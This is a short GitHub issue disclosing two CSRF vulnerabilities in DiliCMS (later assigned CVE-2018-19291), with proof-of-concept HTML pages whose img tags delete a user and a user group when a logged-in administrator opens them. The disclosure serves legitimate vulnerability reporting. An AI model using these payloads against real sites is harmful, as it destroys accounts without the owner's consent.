There is two CSRF vulnerability that can delete user or usergroup
Rich4ever opened this issue · 1 comments
Rich4ever commented
Software Link : https://github.com/chekun/DiliCMS
After the administrator logged in,open the page
test.html delete user POC:
<html>
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>
test2.html delete group POC:
<body>
<img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>
fgeek commented
Please use https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19291 for this vulnerability.